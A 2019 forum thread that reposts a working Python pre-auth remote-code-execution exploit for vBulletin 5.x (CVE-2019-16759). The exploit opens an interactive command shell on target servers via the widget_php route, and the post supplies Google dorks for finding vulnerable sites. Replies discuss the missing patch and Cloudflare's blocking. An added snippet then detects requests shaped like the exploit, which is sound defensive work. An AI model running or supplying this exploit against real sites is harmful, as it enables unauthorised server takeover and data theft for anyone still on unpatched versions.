Nytro Posted September 25, 2019

```python
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
    try:
        cmd = raw_input("vBulletin$ ")
        params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
        r = requests.post(url = sys.argv[1], data = params)
        if r.status_code == 200:
            print r.text
        else:
            sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception, e:
        sys.exit(str(e))
```

Source: FullDisclosure
Zatarra Posted September 25, 2019

Have the vBulletin people released a patch? I'll answer that myself: "Download Options: Download Latest Version 5.5.4". NO.
Nytro Posted September 25, 2019 (Author)

Yep, it's being discussed over on their side too: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild

PS: I hope the hackers don't attack us too with this exploit.
Matasareanu Posted September 25, 2019

48 minutes ago, Nytro said: "Yep, it's being discussed over on their side too: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild PS: I hope the hackers don't attack us too with this exploit."

They can try 😂
Nytro Posted September 25, 2019 (Author)

Well...
mrreboot Posted September 29, 2019

https://www.bleepingcomputer.com/news/security/cloudflare-now-blocks-the-vbulletin-rce-cve-2019-16759-exploit/
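
A defender-side check for the request shape used by the exploit in the first post, the kind of pattern a WAF rule or a scan of logged request bodies can key on. This is an added example, not part of the thread and not any vendor's rule; `classify`, `normalize_route` and the sample requests are constructed for illustration, and the lenient route normalization is an assumption.

```python
from urllib.parse import parse_qsl

ROUTE_PARAM = "routestring"              # parameter name from the posted exploit
WIDGET_ROUTE = "ajax/render/widget_php"  # route value from the posted exploit
CODE_PARAM = "widgetConfig[code]"        # parameter carrying the PHP code


def normalize_route(value):
    """Lower-case, unify slashes and drop empty segments (assumed lenient matching)."""
    segments = value.strip().lower().replace("\\", "/").split("/")
    return "/".join(s for s in segments if s)


def classify(query_string="", body=""):
    """Classify one request from its raw form-urlencoded query string and body."""
    # parse_qsl percent-decodes names and values, so widgetConfig%5Bcode%5D
    # (what the requests library sends) and widgetConfig[code] both match.
    params = parse_qsl(query_string, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    route_hit = any(k == ROUTE_PARAM and normalize_route(v) == WIDGET_ROUTE
                    for k, v in params)
    code_hit = any(k == CODE_PARAM for k, _ in params)
    if route_hit and code_hit:
        return "exploit-shaped"
    if route_hit:
        return "widget-route-only"   # surfaced for review, not proof of an attack
    return "clean"


# Constructed sample requests (query string, body); not taken from real traffic.
SAMPLES = [
    ("", "username=alice&password=x&do=login"),
    ("", "routestring=ajax%2Frender%2Fwidget_php"
         "&widgetConfig%5Bcode%5D=echo+%27probe%27%3B+exit%3B"),
    ("routestring=/Ajax//render/widget_php/", "widgetConfig[code]=x"),
    ("", "routestring=ajax/render/widget_php"),
]

if __name__ == "__main__":
    for query, body in SAMPLES:
        print(classify(query, body), "|", query or body[:60])
```

The check reads both the query string and the body because the two parameters can arrive in either place.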